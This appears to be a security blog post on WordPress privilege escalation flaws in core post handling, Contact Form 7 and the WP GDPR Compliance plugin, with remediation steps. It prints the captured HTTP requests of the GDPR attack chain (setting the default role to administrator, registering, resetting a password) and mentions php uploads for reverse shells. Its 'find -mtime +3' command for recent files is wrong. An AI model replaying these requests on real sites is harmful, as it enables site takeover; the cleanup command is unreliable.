At present, WordPress is one of the prominent & versatile content management systems that power more than 30 percent of the top websites. Alas, this popularity has also drawn numerous WordPress security vulnerabilities that can be easily exploited by web attackers. In this post we will discuss more about WordPress Privilege Escalation Vulnerabilities in Contact Form 7 & WP GDPR compliance plugins and how to fix them.
Let us discuss this vulnerability in detail.
What is WordPress Privilege Escalation through Post Types
As per this vulnerability, anyone can make changes to any post or page on a WordPress website without being authenticated.
A hacker can easily circumvent to create any posts and also misuse the features of custom post types. Based on the installed plugins, more vulnerabilities can be exploited.
What Impact an Attacker Can Have
We all are familiar with the fact that WordPress is a popular blogging software using which you can create and publish posts. Gradually, new types of posts were introduced, for instance – media and pages entries (images, videos, etc.). Plugins are responsible for registering new types of posts, like contact or product forms.
According to the motive of the post type a plugin registers, it provides various exclusive and new features. For instance – a contact form plugin might acknowledge the creation of a contact form with a file upload field, for instance – resumes.
As a user, creator of the contact form, you will be able to define which file types should be permitted. A hacker can also upload php files and then initiate random code on the website.
As per privilege escalation atttack, it permits the lower privileged users to evade various security checks, initiated by WordPress, and create any post and abuse the features of custom post types.
When it comes to registering new post types, plugins tend to make a call to
register_post_type() along with the name of the new post type and meta details.
How Custom Post Types are Protected?
Each post type tends to have its own editor page, for instance – example.com/wordpress/wp-admin/?page=example_post_type_editor
In case the developer of the plugin has decided that only the administrators will be authorized to use the post type of the plugin, he will just verify whether the user is an administrator towards the top of the page and conclude the executive otherwise.
Submission of WordPress Post
As mentioned above, even though each post type has their editor, they can all make use of WordPress post submission API and insert and update the posts using the WordPress function
wp_write_post(). As per this function, the user input is being considered such as
$_POST[‘post_content’] – ,
$_POST[‘post_type’] , and
$_POST[‘post_title’] , therefore it understands how the post should be processed.
As per the first step of submitting a WordPress post, it is imperative for WP to be acquainted with the fact whether you want to make some changes to an existing post or create a new one. WordPress ensures this by checking whether you have shared the post ID. Remember WP will only allow $_POST[‘post_ID’] or $_GET[‘post’]. In case an ID is set, you want to make changes to an existing post using that ID. Or else, you want to create a new post.
The second step involves the determination of the type of post you are creating. If you have shared the post ID, WP will pull the post_type column from the database from the wp_posts. In case you want to create a new post; the target post type will be $_POST[‘post_type’].
The moment WP gets familiar with the type of the post you are trying to create or edit, it will confirm whether you are authorized to make use of that post type. WP carries out this by confirming a nonce that is only acquired from the editor page of the post type.
The nonce confirmation is done with the help of the following code –
If the $post_type was a post, then, in that case, $nonce_name will be add-post. If $post_type was example_post_type, then in that scenario the $nonce_name will be add-example_post_type. You can have this nonce only if you are capable of creating such post types since such users can have access to the editor page of that post type, which is the only available method through which nonce can be obtained.
Failure of WordPress
Although lower privileged attackers, such as all the attackers performing the role of a contributor, are not able to access the page and nonce of the example post type, he always stands a chance to get the nonce of a normal post, which has the non-complex internal post type post.
Well, this means that he can just set the post ID to a post with a post type post. With the help of this, he can easily pass the nonce verification.
However, using this method, changes can be made only to the existing post and overwriting the post_type of a post is not feasible. In case a post ID is set, WP will remove the post_type from the parameters before the post gets updated.
💡 Related Post –WordPress Vulnerability In Social Warfare Plugin
In the case, $_POST[‘post_ID’] is set, WordPress will only get rid of $post_type parameter. The hacker can also send a post ID either through: $_GET[‘post’] or $_POST[‘post_ID’]. In case the hacker chose to send a post ID through $_GET[‘post’], the following things will happen –
- The moment WordPress realizes that a post ID has been set, it tends to pull its post type from the database.
- WP confirms whether the hacker has shared a genuine nonce for that post type (which he can always have for a normal post).
- When the nonce check is passed, WP decides whether it should make a call to wp_insert_post() or wp_update_post(). This is done by checking if $_POST[‘post_ID’] is set. In case it is, wp_update_post will be called and $post_type parameter will be confiscated. This will not allow the hacker to overwrite the post type. If it is not set, then, in that case, WP will call wp_insert_post() and make use of $_POST[‘post_type’] as the post type of the new post.
Since WordPress is not able to remember to check $_GET[‘post’] in the 3rd step; the hacker can easily pass the nonce verification and create a new post successfully using a random post type. The given code snippets are abstracted and simplified, the actual code spans across various files and function calls, which makes the whole process vulnerable to such errors.
At this stage, let us shift our attention towards two of the most WP popular plugins, Contact Form 7 and GDPR Compliance plugin, and the vulnerabilities both these plugins have to face.
💡 Related Post – Convert Plus WordPress Plugin Vulnerability Exploit
Contact Form 7 Vulnerability: WordPress Privilege Escalation
Of late, a privilege escalation vulnerability has been detected in Contact Form 7. Making use of this vulnerability, any logged-in user, in the contributor role, has the authority to make changes to the contact forms.
A privilege escalation issue has been patched up in Contact Form 7 5.0.3 and older versions. It is recommended to update your WordPress Contact 7 plugin.
The Capability_type argument is a string, and it is being used to build read, edit, and delete competences. The key parameter used to build capabilities is capability_type unless they are set with explicitly set with capabilities parameter.
We are all familiar with the fact that WordPress allows multiple roles such as a subscriber, editor, author, and contributor, etc. Owing to this vulnerability, if you are logged in as a contributor, you have the authority to make changes to Contact Form, this particular feature is currently enjoyed exclusively by the admins and editors. If we talk about this particular vulnerability, then it is far more perilous than it seems, and the following two features help in this –
- Contact Form 7 permitted absolute file path, i.e. /host/home/somefile.pdf. Therefore, equipped with the authority to make changes in the form, the hacker has easy access to the files outside wp-content.
- ‘Filetypes’: A non-privileged user also enjoys the authority to make changes to the feature filetypes, i.e. (filetypes: gif|png|jpg|jpeg). The changes are made to accommodate various files such as – asp, .php, etc. (filetypes: php|asp) and acquire reverse shells.
Related Post – WordPress REST API Vulnerability Exploit
Thus, the hacker has full authority to introduce the file type of his/her choice in the wp-content directory and get access to a reverse shell making way for future attacks.
The author of this plugin has prohibited the file path (temporary solution) that mentions a file placed outside the wp-content directory. To be on the safer side, make sure you have updated to the latest version and move your files to <your WordPress root>/wp-content/ and also ensure to replace the line in the File Attachment fields consequently.
How to Fix Contact Form 7 WordPress Privilege Escalation Vulnerability?
- Make sure you update to the latest version of Contact Form 7.
- When you update to the updated version, it will limit the feature of local file attachment. More precisely, you will not be able to define an absolute file path that implies a file place outside the wp-content directory.
- With the help of wp-media uploader, upload local file attachments inside the wp-content directory. Once you have done this, mention its URL along with relative or absolute file paths. Therefore, you just need to make changes to the location of the attachment files.
Now, let us discuss WP GDPR Compliance plugin vulnerability in detail.
💡 Related Post – WordPress GDPR Compliance Guide 2019 + Plugins
WordPress GDPR Compliance Plugin Privilege Escalation
At the moment, there are more than 100,000 active installations of GDPR (General Data Protection Regulation) plugin. Every vulnerability which has been reported permitted the hackers to attain privilege escalation; this further allowed them to infect other vulnerable websites. If any website is using this plugin then they should update it to the latest version or in case the update is not available then they should remove it right away.
Generally, few types of actions are being handled by the plugin, which can be submitted through admin-ajax.php functionality of WP. These actions comprise of deletion requests and data access requests needed by GDPR. However, it also includes the functionality of changing the settings of the plugin from the admin dashboard of WordPress.
Besides storage of the arbitrary options, the plugin carries out a do_action () call with the help of provided name and value, which can be used by the hacker to activate despotic WordPress actions.
Identifying the Attack
As per the experts, the attack takes place in different stages.
- Enabling website registrations and setting the default permissions
This is carried out by using POST request to your wp/admin-ajax.php. The request will look like this –
Host:XXXXXX.COM Accept-Encoding:gzip Content-Length:188 Content-Type:application/x-www-form-urlencoded Referer:http://XXXXXX.COM/wp-login.php?action=rp User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 BODY: action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22default_role%22%2C%22value%22+%3A%22administrator%22%7D&security=1e35284ab4
- The hacker tries to register a new user
It is observed that most of the attacks, in the wild, make their best efforts to register with the below-mentioned two users –
This is how the real post request will look like –
Request_URI: http://XXXXXX.COM/wp-login.php?action=register BODY: redirect_to=&user_email=trollherten%40mail.com&user_login=t2trollherten&wp-submit=Register
- The hacker tries to reset username and password
Most of the times, the hacker tries to reset the malicious user password.
The request look like this –
Cookie: wordpress_test_cookie=WP+Cookie+check; path=/;wp-resetpass-464755d4cc9c2c0d7cc2b015eb2b7c0a=t2trollherten%3A76cnn4sryixU82wtCG9j; path=/wp-login.php; httponly; URI: /wp-login.php?action=resetpass BODY: pass1=0rt8Ka7slborUi&pass1-text=0rt8Ka7slborUi&pass2=0rt8Ka7slborUi&rp_key=76cnn4sryixU82wtCG9j&wp-submit=Reset%2BPassword
At this point, the hacker has successfully created administrator user.
What harmful actions hackers can make after exploiting the website
Once the hacker has exploited your website, most of the damage comprises of –
- He will damage the website by changing the url of the website. This is usually done to carry out Black Hat SEO.
- He can install harmful wp plugins.
- He can add harmful administrator users to the database.
- He can upload new web shells in the document root of the website.
- He can add malicious cronjobs.
- He can add crontab crons, this will infect the account once again.
- Infecting existing files with shells.
How to Fix WP GDPR Compliance Vulnerability?
Before you go ahead and make the recovery of the website, make sure you have updated to the latest version of the WP GDPR.
Now, let us discuss various methods to fix this issue.
- Restore all the Data from the Recent Backup
In the pursuit of cleaning your WordPress website, make sure you are aware of the fact that this is one of the most crucial steps. If you don’t have any backup, you can move ahead with the next fix.
- Look for Newly Added Users in the Database and Get Rid of Them
If you want to look for the newly created users, you will have to look inside db->wp_users table.
We have noticed two users who are actively injected in the database –
- | 20 | t2trollherten | $P$ByTG6qJi/eGVCRB2i.n/wS80Y967ng/ | t2trollherten | firstname.lastname@example.org | | 2018-11-08 13:43:38 | | 0 | t2trollherten |
- | 21 | t3trollherten | $P$Bb7f2NV78UD2/nNpB6aKCStQnit99l1 | t3trollherten | email@example.com | | 2018-11-08 15:58:44 | | 0 | t3trollherten |
- Look for newly created files in your hosting account
In case you have multiple websites existing in the same account, make sure you have searched the whole account rather than just searching the website directory which has been hacked.
To make things easier, you may try searching with find for files added in the last couple of days. It will search for all the modified files in the last three days.
find . -type f -mtime +3
- Delete the Suspicious WordPress Plugins
Have a closer look, if you find any suspicious WP plugin (recently installed), make sure you get rid of it immediately.
💡 Related Post – WordPress Arbitrary File Deletion Vulnerability